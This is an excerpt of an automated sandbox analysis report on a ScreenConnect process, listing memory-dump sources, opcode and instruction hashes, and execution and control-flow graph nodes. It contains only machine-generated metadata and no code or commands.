                                                                                                                          • Instruction Fuzzy Hash: 9711AF71B09E4A4FDB98DE58D8A4A6937D2FFA8714B0501BDD41EC72A2DE21FC42CB40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4db9758fdc914a992f0da390bc4ec60ac803e1c66f35cf91b247ce99f9c29423
                                                                                                                          • Instruction ID: 71e1389aa36297a63e61111bff431b4445f27cf6cec12cd996f19fb16c7cfb7a
                                                                                                                          • Opcode Fuzzy Hash: 4db9758fdc914a992f0da390bc4ec60ac803e1c66f35cf91b247ce99f9c29423
                                                                                                                          • Instruction Fuzzy Hash: C411AF71B09A494FDBA8EF58C460A6A77A1FF68304B1541A8C44ECB2D7DE25E846CB80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d6c1103b2ea6dc37c48060a67b102d7f231d7c7bcc689d46feadea4b7f05a810
                                                                                                                          • Instruction ID: b9992556f45529859ae3e6a2b525aa570751ae99f5023c7f228493e827ba9561
                                                                                                                          • Opcode Fuzzy Hash: d6c1103b2ea6dc37c48060a67b102d7f231d7c7bcc689d46feadea4b7f05a810
                                                                                                                          • Instruction Fuzzy Hash: 2E11BB71B09A494FDB98EF58C460A6A77A2FF68304B0540A8C44ECB2D7DE25E846CB80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f4cfafac0cdf9e240ce7f8dbf9e23481caca64f8782c24ee5e6ffde70bfbfcec
                                                                                                                          • Instruction ID: de80b6f2cfeb0398a0314c00cfe47ce124fe5ef3f8e2c62998111b4bdf8ea4a8
                                                                                                                          • Opcode Fuzzy Hash: f4cfafac0cdf9e240ce7f8dbf9e23481caca64f8782c24ee5e6ffde70bfbfcec
                                                                                                                          • Instruction Fuzzy Hash: 86112910F0EA5B0BF779936884B077626E1FF45304F4A40BEC40DC21E6DC2C9E858711
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e4fd6f38806a74c5a0d372ef7acf6d54dcc2f50f44e1b8c072dac6907a498228
                                                                                                                          • Instruction ID: b122b474358c62db95b1332d8e98ea2b98c3c4bb79bc95a4aff578af9eec83d9
                                                                                                                          • Opcode Fuzzy Hash: e4fd6f38806a74c5a0d372ef7acf6d54dcc2f50f44e1b8c072dac6907a498228
                                                                                                                          • Instruction Fuzzy Hash: 2D012D51B1AE1E0BFB98AB6D14E55B756D2FFE43847554079D00DC31DADC2CE9414740
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c9645384c6ab4b6ec4b82dd1c788c3bf7b4fb9e11d9bf8328c4fa490d18543ff
                                                                                                                          • Instruction ID: a2bfd2afd274dcb7326ae54180ae12627b8ed4ccb6ed313d871ff94755fd28ac
                                                                                                                          • Opcode Fuzzy Hash: c9645384c6ab4b6ec4b82dd1c788c3bf7b4fb9e11d9bf8328c4fa490d18543ff
                                                                                                                          • Instruction Fuzzy Hash: 44014552B1EE5E0BFB98EBAD14E55B2A6D2FBA428475540B9C00CC31DBEC2CEA814740
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ea2becba4068b9bdc3319d64a5229b0a6250b014036fb29d71300a697097f351
                                                                                                                          • Instruction ID: f6ad01d9ca3986ff2c8c653ed75644aa6565e9f36ffc4cf64de2feeeceb5da75
                                                                                                                          • Opcode Fuzzy Hash: ea2becba4068b9bdc3319d64a5229b0a6250b014036fb29d71300a697097f351
                                                                                                                          • Instruction Fuzzy Hash: 5601DB11B0FA9E05EEB613A815341F927A1AF96225F4B00B7D84CC71E7CD4C5E864252
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d740e7f9408bfc19fc7e15fed1bc27a1bb104ae707b53c7b7db2b6c3fd44e1b0
                                                                                                                          • Instruction ID: 926cc150a0bb0e920d4e5d8cb650a8c286da0cfea4e0cb147b4f6d5c2b25399b
                                                                                                                          • Opcode Fuzzy Hash: d740e7f9408bfc19fc7e15fed1bc27a1bb104ae707b53c7b7db2b6c3fd44e1b0
                                                                                                                          • Instruction Fuzzy Hash: EB01D63654EBD84FE76316B19C245823FB4FF87218B0A01EBE488CB0A3D66D5916C722
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 301cf39c41cd2f64e4638123c98006d457b71234005283b98417ba1a390596df
                                                                                                                          • Instruction ID: aa35bf2beb9180f6e5112bb1862237452390c439e7a6de6ec0ad0c4bf8bf0652
                                                                                                                          • Opcode Fuzzy Hash: 301cf39c41cd2f64e4638123c98006d457b71234005283b98417ba1a390596df
                                                                                                                          • Instruction Fuzzy Hash: B9F0622144E6D60FD36697F488656E47FF0EF8B220B0E41FBD484CB5A3D50C59868361
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dd89c83ce792fc2ec8216061f4d5c1fd05064a4dd641ed487f1652816eadaaee
                                                                                                                          • Instruction ID: 8c5585fccf0e7507fda7fa8c94b4868d7b5976f7e0c0d6415e17a237202f909f
                                                                                                                          • Opcode Fuzzy Hash: dd89c83ce792fc2ec8216061f4d5c1fd05064a4dd641ed487f1652816eadaaee
                                                                                                                          • Instruction Fuzzy Hash: 37F0E510F1887D0BF768A76868293BD72C1FF8A718F5250BED41EC22DADD191D8646C2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0172da2e69b7f6e58bc1eb4bcad018223176bc2004e374ebec9f85e8de654768
                                                                                                                          • Instruction ID: f295a0ee6a93d2f078803a0cc6b74074e595a50ec7c46eab78c38fafe3a340e6
                                                                                                                          • Opcode Fuzzy Hash: 0172da2e69b7f6e58bc1eb4bcad018223176bc2004e374ebec9f85e8de654768
                                                                                                                          • Instruction Fuzzy Hash: 4BF06D3540D68C9FCB43EBA8D4608D67F70EE56320B0501DBE089CB462E7218A59CB82
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 95292d50e5d249d3b2277d807f783a0818cd5cfb21daa3b6044c2a4cfc180e1d
                                                                                                                          • Instruction ID: dbf56687c5639124e593a1cdfdbe3df7c2102695efb31aa3b493180529fa9d23
                                                                                                                          • Opcode Fuzzy Hash: 95292d50e5d249d3b2277d807f783a0818cd5cfb21daa3b6044c2a4cfc180e1d
                                                                                                                          • Instruction Fuzzy Hash: 58E0926110F7D40FD752973584698E57FB0ED1321034900EBD5818F4B3E5158649CB41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f82f60e0463b3e3b95260ca83087835c41aca1ef388fc1c8bdd31e123993e6dd
                                                                                                                          • Instruction ID: f800232934575827cac644aeb95d8936312adaf042892a37417529465b0a9e79
                                                                                                                          • Opcode Fuzzy Hash: f82f60e0463b3e3b95260ca83087835c41aca1ef388fc1c8bdd31e123993e6dd
                                                                                                                          • Instruction Fuzzy Hash: D4D05B12B56D2D0FDAA0E56C28A52F542C2E7D86A178601B3D80DC3295DC15ADC24380
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: de7ce79b4ed6f41420a29a07b7fcc768b69534f97234168c967087ed23f882c4
                                                                                                                          • Instruction ID: fb63d320ea3d5b9388c36b55a6e54e2fa87f167d3a66bba3dd8a864668d650c5
                                                                                                                          • Opcode Fuzzy Hash: de7ce79b4ed6f41420a29a07b7fcc768b69534f97234168c967087ed23f882c4
                                                                                                                          • Instruction Fuzzy Hash: 6AE08C15E4EA2B02FB7C22A5B8B27BA6080BF05304F4A407E941AC10E9DD5C9E808562
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1d651384dfde04b4369404b5831fab6cb0fd6d47b8cccd63ecdb392ad428048f
                                                                                                                          • Instruction ID: a08a41d725483a92dc48abc22377ecd0f1429f0bbfa03e220fd9f0a998d651b4
                                                                                                                          • Opcode Fuzzy Hash: 1d651384dfde04b4369404b5831fab6cb0fd6d47b8cccd63ecdb392ad428048f
                                                                                                                          • Instruction Fuzzy Hash: 81C09B10F1A95E46F164EBE4D4716BE25527F8C704B564435D00EC21D6CD3C67015955

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:13.4%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:11
                                                                                                                          Total number of Limit Nodes:3
                                                                                                                          execution_graph 15023 7ffd9b878014 15025 7ffd9b87801d 15023->15025 15024 7ffd9b878082 15025->15024 15026 7ffd9b8780f6 SetProcessMitigationPolicy 15025->15026 15027 7ffd9b878152 15026->15027 15028 7ffd9bb8958c 15029 7ffd9bb8955b 15028->15029 15030 7ffd9bb8959b 15028->15030 15031 7ffd9bb896f9 GlobalMemoryStatusEx 15030->15031 15033 7ffd9bb89658 15030->15033 15032 7ffd9bb89725 15031->15032

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 7ffd9bb8958c-7ffd9bb89599 1 7ffd9bb8955b 0->1 2 7ffd9bb8959b-7ffd9bb895ca 0->2 4 7ffd9bb89566-7ffd9bb89587 1->4 5 7ffd9bb8955d-7ffd9bb89565 1->5 7 7ffd9bb895cc-7ffd9bb895f5 2->7 8 7ffd9bb89614-7ffd9bb89626 2->8 5->4 9 7ffd9bb895f7-7ffd9bb895fa 7->9 10 7ffd9bb8964e 7->10 12 7ffd9bb89628-7ffd9bb8962d 8->12 13 7ffd9bb896a2-7ffd9bb896ac 8->13 14 7ffd9bb8967b-7ffd9bb8967f 9->14 15 7ffd9bb895fc-7ffd9bb895fe 9->15 16 7ffd9bb8964f 10->16 17 7ffd9bb896ae-7ffd9bb896af 12->17 18 7ffd9bb8962f-7ffd9bb89631 12->18 19 7ffd9bb896ad 13->19 36 7ffd9bb89680 14->36 20 7ffd9bb8967a 15->20 21 7ffd9bb89600 15->21 22 7ffd9bb896cb-7ffd9bb896d0 16->22 23 7ffd9bb89650 16->23 25 7ffd9bb896f9-7ffd9bb89723 GlobalMemoryStatusEx 17->25 26 7ffd9bb896b0-7ffd9bb896b1 17->26 18->19 24 7ffd9bb89633-7ffd9bb89637 18->24 19->17 20->14 28 7ffd9bb89602-7ffd9bb89604 21->28 29 7ffd9bb89643 21->29 30 7ffd9bb896d1-7ffd9bb896f7 22->30 23->30 31 7ffd9bb89651 23->31 32 7ffd9bb89639 24->32 33 7ffd9bb896b3-7ffd9bb896b8 24->33 39 7ffd9bb89725 25->39 40 7ffd9bb8972b-7ffd9bb89752 25->40 26->33 28->36 37 7ffd9bb89606 28->37 34 7ffd9bb89645 29->34 35 7ffd9bb896bf-7ffd9bb896c3 29->35 30->25 41 7ffd9bb89652-7ffd9bb89656 31->41 42 7ffd9bb89693-7ffd9bb8969f 31->42 32->14 47 7ffd9bb8963b-7ffd9bb8963d 32->47 48 7ffd9bb896b9-7ffd9bb896be 33->48 49 7ffd9bb89646-7ffd9bb89647 34->49 50 7ffd9bb89687-7ffd9bb89689 34->50 51 7ffd9bb896c5 35->51 52 7ffd9bb89608-7ffd9bb8960a 37->52 53 7ffd9bb89649 37->53 39->40 43 7ffd9bb896c6-7ffd9bb896ca 41->43 44 7ffd9bb89658-7ffd9bb89679 41->44 42->13 43->22 44->20 47->48 54 7ffd9bb8963f-7ffd9bb89641 47->54 48->35 49->53 56 7ffd9bb8968b-7ffd9bb8968e 50->56 57 7ffd9bb8968f 50->57 51->43 58 7ffd9bb89686 52->58 59 7ffd9bb8960c 52->59 53->51 55 7ffd9bb8964b-7ffd9bb8964d 53->55 54->29 55->10 56->57 61 7ffd9bb89691 57->61 62 7ffd9bb89692 57->62 58->50 59->16 63 7ffd9bb8960e-7ffd9bb89611 59->63 61->62 62->42 63->8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.2031085550.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9bb80000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: H
                                                                                                                          • API String ID: 0-2852464175
                                                                                                                          • Opcode ID: 12b2bb1e7cc9c2511d10fa959916593203c7eb6e7f2bc3a7fbc014cdd1edb614
                                                                                                                          • Instruction ID: 42b8d34a1a7eacc18fdbec088092862e826393f5dbdf5b4e910d79d72f42e5b6
                                                                                                                          • Opcode Fuzzy Hash: 12b2bb1e7cc9c2511d10fa959916593203c7eb6e7f2bc3a7fbc014cdd1edb614
                                                                                                                          • Instruction Fuzzy Hash: 52814C31A0EA8D4FEB75C6A888296B97FE0FF56314F0501BAD1DDC75E3DE2469068341

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.2028705551.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9b870000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1088084561-0
                                                                                                                          • Opcode ID: 214aa30f163e4f844ad254ad7dd08374d64b16061b9586c37bda01ac30a39552
                                                                                                                          • Instruction ID: e262aa0e30d97c1f88781fc151703b50025a78ebfdbde1dcea6e75fae65f9cff
                                                                                                                          • Opcode Fuzzy Hash: 214aa30f163e4f844ad254ad7dd08374d64b16061b9586c37bda01ac30a39552
                                                                                                                          • Instruction Fuzzy Hash: 38412831D0DB494FDB29AFA89C4A5E97BE0EF59310F04017FE049C3292DB78A9468B91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1029 7ffd9b873aa2-7ffd9b8780ef 1031 7ffd9b8780f6-7ffd9b878150 SetProcessMitigationPolicy 1029->1031 1032 7ffd9b878152 1031->1032 1033 7ffd9b878158-7ffd9b878187 1031->1033 1032->1033
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.2028705551.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd9b870000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1088084561-0
                                                                                                                          • Opcode ID: c07a17e83873d6989ef5a0377e03b5e3a8ba0c6e76e2faf2ad522122c959c698
                                                                                                                          • Instruction ID: 1aaaa4419df4ffd5592ca908b5a602d0e8f5a913089580bfb99460d2d38ebbaa
                                                                                                                          • Opcode Fuzzy Hash: c07a17e83873d6989ef5a0377e03b5e3a8ba0c6e76e2faf2ad522122c959c698
                                                                                                                          • Instruction Fuzzy Hash: 1921D731918B188FDB28AF9D9C4AAF97BE0EB59711F00412EE049D3251DB74B8468B91